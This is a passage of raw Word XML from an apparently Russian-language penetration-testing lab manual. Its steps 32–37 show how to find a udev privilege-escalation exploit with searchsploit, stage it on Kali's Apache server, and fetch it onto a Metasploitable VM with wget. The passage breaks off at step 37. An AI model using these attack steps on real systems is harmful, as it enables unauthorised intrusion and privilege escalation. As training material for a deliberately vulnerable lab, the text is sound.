    <w:p w14:paraId="6B33622F" w14:textId="5FBB9670" w:rsidR="001666C0" w:rsidRPr="008D197E" w:rsidRDefault="001666C0" w:rsidP="00BB7C0B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D197E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IV</w:t>
      </w:r>
      <w:r w:rsidRPr="008D197E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>. Базовая реализация атаки на виртуальную машину Metasploitable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202F8449" w14:textId="78BCCAC1" w:rsidR="003168F4" w:rsidRPr="003A6888" w:rsidRDefault="006320E3" w:rsidP="00BB7C0B">
      <w:r>
        <w:t>32</w:t>
      </w:r>
      <w:r w:rsidR="003168F4" w:rsidRPr="003168F4">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="004722CC">
        <w:t xml:space="preserve">В новом терминале </w:t>
      </w:r>
      <w:r w:rsidR="004722CC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
      <w:r w:rsidR="004722CC" w:rsidRPr="004722CC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004722CC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidR="004722CC" w:rsidRPr="004722CC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004722CC">
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidR="003168F4">
        <w:t>ыполни</w:t>
      </w:r>
      <w:r w:rsidR="004722CC">
        <w:t>те</w:t>
      </w:r>
      <w:r w:rsidR="003168F4">
        <w:t xml:space="preserve"> поиск эксплойта для </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003168F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>udev</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003A6888">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB515C3" w14:textId="2CAC44A0" w:rsidR="004722CC" w:rsidRPr="00BB5586" w:rsidRDefault="004722CC" w:rsidP="00BB7C0B">
      <w:pPr>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5586">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB5586">
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>udev</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB5586">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> – это менеджер устройств для новых версий ядра </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB5586">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB5586">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve">, являющийся преемником </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB5586">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>devfs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB5586">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB5586">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>hotplug</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB5586">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> и HAL. Его основная задача — обслуживание файлов устройств в каталоге /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB5586">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>dev</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB5586">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> и обработка всех действий, выполняемых в пространстве пользователя при добавлении/отключении внешних устройств, включая загрузку </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB5586">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>firmware</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB5586">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D1759B" w14:textId="0F730AAE" w:rsidR="00923311" w:rsidRPr="003A6888" w:rsidRDefault="00923311" w:rsidP="00BB7C0B">
      <w:r>
        <w:t xml:space="preserve">Вернитесь обратно в </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923311">
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923311">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923311">
        <w:t>framework</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> нажав </w:t>
      </w:r>
      <w:r w:rsidRPr="006320E3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ctrl</w:t>
      </w:r>
      <w:r w:rsidRPr="006320E3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidRPr="006320E3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и подтвердив </w:t>
      </w:r>
      <w:r w:rsidR="003A6888">
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="006320E3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>y</w:t>
      </w:r>
      <w:r w:rsidR="003A6888">
        <w:t>»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1C59B8" w14:textId="4F483F0C" w:rsidR="00BD68C4" w:rsidRPr="00BD68C4" w:rsidRDefault="00BD68C4" w:rsidP="00BB7C0B">
      <w:r>
        <w:t>Найдите эксплойт командой:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F298D1" w14:textId="16273F53" w:rsidR="003168F4" w:rsidRPr="006320E3" w:rsidRDefault="003168F4" w:rsidP="00BB7C0B">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006320E3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>searchsploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006320E3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006320E3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>udev</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4ADD81E3" w14:textId="77777777" w:rsidR="00B6363D" w:rsidRDefault="009A65C6" w:rsidP="006320E3">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="009A65C6">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2469C9CD" wp14:editId="4F82A2EF">
            <wp:extent cx="5760000" cy="19693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B3E3" w14:textId="77777777" w:rsidR="00A80E96" w:rsidRPr="00A80E96" w:rsidRDefault="00A80E96" w:rsidP="00A80E96">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Нам</w:t>
      </w:r>
      <w:r w:rsidRPr="00A80E96">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>интересен</w:t>
      </w:r>
      <w:r w:rsidRPr="00A80E96">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> local privilege </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A80E96">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Escalation(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A80E96">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">2) — </w:t>
      </w:r>
      <w:r w:rsidRPr="006320E3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/exploits/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006320E3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006320E3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/local/8572.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCDCE8F" w14:textId="65BEF1A4" w:rsidR="006320E3" w:rsidRDefault="006320E3" w:rsidP="00CF03D8">
      <w:r>
        <w:t xml:space="preserve">Обратите внимание на запись пути к эксплойту. В дальнейшем мы будем использовать </w:t>
      </w:r>
      <w:r w:rsidR="00BB5586">
        <w:t>этот путь</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для</w:t>
      </w:r>
      <w:r w:rsidR="00BB5586">
        <w:t xml:space="preserve"> написания команды</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> отправки эксплойта не веб-сервер.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3F70B7" w14:textId="77777777" w:rsidR="006320E3" w:rsidRDefault="006320E3" w:rsidP="00CF03D8"/>
    <w:p w14:paraId="7E1DDDCF" w14:textId="7334CC60" w:rsidR="003168F4" w:rsidRPr="00A80E96" w:rsidRDefault="006320E3" w:rsidP="00CF03D8">
      <w:r>
        <w:t>33</w:t>
      </w:r>
      <w:r w:rsidR="00CF03D8" w:rsidRPr="00A80E96">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Загрузите информацию о эксплойте и изучите как </w:t>
      </w:r>
      <w:r w:rsidR="00CF03D8">
        <w:t>его использовать</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD33FF0" w14:textId="0A03EAF0" w:rsidR="009A65C6" w:rsidRDefault="003168F4" w:rsidP="006320E3">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="003168F4">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15F06D8F" wp14:editId="72287063">
            <wp:extent cx="5760000" cy="155803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5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B62E" w14:textId="59487674" w:rsidR="00BB5586" w:rsidRDefault="00BB5586" w:rsidP="006320E3">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7548D032" w14:textId="77777777" w:rsidR="003168F4" w:rsidRDefault="003168F4" w:rsidP="006320E3">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="003168F4">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18EEE800" wp14:editId="55D77D45">
            <wp:extent cx="5760000" cy="16781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765A" w14:textId="77777777" w:rsidR="006320E3" w:rsidRDefault="006320E3" w:rsidP="00FB3E06"/>
    <w:p w14:paraId="05681198" w14:textId="408D7901" w:rsidR="00FB3E06" w:rsidRPr="00BD68C4" w:rsidRDefault="006320E3" w:rsidP="00FB3E06">
      <w:r>
        <w:t>34</w:t>
      </w:r>
      <w:r w:rsidR="00FB3E06" w:rsidRPr="00BD68C4">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00BD68C4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>В</w:t>
      </w:r>
      <w:r w:rsidR="00BD68C4">
        <w:t xml:space="preserve"> новом окне терминала з</w:t>
      </w:r>
      <w:r w:rsidR="00FB3E06">
        <w:t xml:space="preserve">апускаем </w:t>
      </w:r>
      <w:r w:rsidR="00FB3E06">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>apache</w:t>
      </w:r>
      <w:r w:rsidR="00FB3E06" w:rsidRPr="00BD68C4">
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для того, чтобы загрузить на его веб-сервер эксплойт (а затем скачать на атакуемую виртуальную машину)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0477986A" w14:textId="77777777" w:rsidR="003168F4" w:rsidRDefault="003168F4" w:rsidP="006320E3">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="003168F4">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E8364FB" wp14:editId="593934BD">
            <wp:extent cx="3600000" cy="403361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3047" w14:textId="77777777" w:rsidR="00BB5586" w:rsidRDefault="00BB5586" w:rsidP="00A80E96"/>
    <w:p w14:paraId="7B1EC3B7" w14:textId="6A422A1F" w:rsidR="003168F4" w:rsidRPr="00BB5586" w:rsidRDefault="006320E3" w:rsidP="00A80E96">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>35</w:t>
      </w:r>
      <w:r w:rsidR="00A80E96" w:rsidRPr="00AC25B3">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00A80E96">
        <w:t xml:space="preserve">Скопируем эксплойт в </w:t>
      </w:r>
      <w:r w:rsidR="00987B22">
        <w:t xml:space="preserve">публичную </w:t>
      </w:r>
      <w:r w:rsidR="00A80E96">
        <w:t xml:space="preserve">директорию </w:t>
      </w:r>
      <w:r w:rsidR="00BB5586">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Apache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66473FEF" w14:textId="4BC13748" w:rsidR="00A80E96" w:rsidRDefault="00AC25B3" w:rsidP="00A80E96">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006320E3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006320E3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> cp /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006320E3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006320E3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/share/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006320E3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exploitdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006320E3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/exploits/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006320E3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006320E3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/local/8572.c /var/www/html/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00987B22" w:rsidRPr="006320E3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kali</w:t>
      </w:r>
      <w:r w:rsidRPr="006320E3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4E72B493" w14:textId="20F45D99" w:rsidR="006320E3" w:rsidRPr="006320E3" w:rsidRDefault="006320E3" w:rsidP="00A80E96">
      <w:r>
        <w:t xml:space="preserve">Особое внимание уделите правильной </w:t>
      </w:r>
      <w:r w:rsidRPr="006320E3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>расстановке пробелов</w:t>
      </w:r>
      <w:r w:rsidRPr="006320E3">
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>в команде</w:t>
      </w:r>
      <w:r w:rsidR="00E11D06">
        <w:t xml:space="preserve"> по примеру, приведенному ниже</w:t>
      </w:r>
      <w:r>
        <w:t>!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566CA8C9" w14:textId="77777777" w:rsidR="007135F1" w:rsidRDefault="007135F1" w:rsidP="006320E3">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007135F1">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FD32B45" wp14:editId="258E2348">
            <wp:extent cx="5760000" cy="1584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FA0" w14:textId="77777777" w:rsidR="00E11D06" w:rsidRDefault="00E11D06" w:rsidP="007135F1"/>
    <w:p w14:paraId="2194159E" w14:textId="553022A0" w:rsidR="007135F1" w:rsidRPr="00BB5586" w:rsidRDefault="00E11D06" w:rsidP="007135F1">
      <w:pPr>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5586">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>36</w:t>
      </w:r>
      <w:r w:rsidR="007135F1" w:rsidRPr="00BB5586">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>. Скопируем эксплойт на уязвимую</w:t>
      </w:r>
      <w:r w:rsidR="006320E3" w:rsidRPr="00BB5586">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> виртуальную</w:t>
      </w:r>
      <w:r w:rsidR="007135F1" w:rsidRPr="00BB5586">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:commentRangeStart w:id="11"/>
      <w:r w:rsidR="007135F1" w:rsidRPr="00BB5586">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>машину</w:t>
      </w:r>
      <w:commentRangeEnd w:id="11"/>
      <w:r w:rsidR="006042CD">
        <w:rPr>
          <w:rStyle w:val="af6"/>
        </w:rPr>
        <w:commentReference w:id="11"/>
      </w:r>
      <w:r w:rsidR="006320E3" w:rsidRPr="00BB5586">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="006320E3" w:rsidRPr="00BB5586">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>обратите внимание</w:t>
      </w:r>
      <w:r w:rsidR="006320E3" w:rsidRPr="00BB5586">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB5586">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>для выполнения команды необходимо перейти в</w:t>
      </w:r>
      <w:r w:rsidR="006320E3" w:rsidRPr="00BB5586">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> окн</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB5586">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidR="00775013">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve">, где Вы выполняли команду пункта 14 с подключением к </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00775013">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00775013" w:rsidRPr="00775013">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00775013">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve">по </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00775013">
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00775013" w:rsidRPr="00775013">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00775013">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve">и </w:t>
      </w:r>
      <w:r w:rsidR="00775013" w:rsidRPr="00402BDD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>указать</w:t>
      </w:r>
      <w:r w:rsidR="00775013" w:rsidRPr="00402BDD">
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00775013">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve">в </w:t>
      </w:r>
      <w:r w:rsidR="00402BDD">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>команде</w:t>
      </w:r>
      <w:r w:rsidR="00775013">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00775013" w:rsidRPr="00402BDD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00775013" w:rsidRPr="00402BDD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>-адрес</w:t>
      </w:r>
      <w:r w:rsidR="00402BDD" w:rsidRPr="00402BDD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> Вашей </w:t>
      </w:r>
      <w:r w:rsidR="00402BDD" w:rsidRPr="00402BDD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
      <w:r w:rsidR="00402BDD" w:rsidRPr="00402BDD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00402BDD" w:rsidRPr="00402BDD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidR="006320E3" w:rsidRPr="00BB5586">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490E05C5" w14:textId="132FD1B6" w:rsidR="007135F1" w:rsidRPr="00A333D7" w:rsidRDefault="007135F1" w:rsidP="007135F1">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006320E3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006320E3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.56.102/</w:t>
      </w:r>
      <w:r w:rsidRPr="006320E3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kali</w:t>
      </w:r>
      <w:r w:rsidRPr="006320E3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="006320E3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A003953" w14:textId="77777777" w:rsidR="00210D60" w:rsidRDefault="00210D60" w:rsidP="00E11D06">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00210D60">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B1156ED" wp14:editId="305E306D">
            <wp:extent cx="5760000" cy="192305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8F36" w14:textId="77777777" w:rsidR="00E11D06" w:rsidRDefault="00E11D06" w:rsidP="007135F1"/>
    <w:p w14:paraId="35A3E810" w14:textId="6B102B6C" w:rsidR="00210D60" w:rsidRPr="00E11D06" w:rsidRDefault="00E11D06" w:rsidP="007135F1">
      <w:r>
        <w:t>37</w:t>
      </w:r>
      <w:r w:rsidR="00210D60" w:rsidRPr="00FB0948">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t>Э</w:t>
      </w:r>
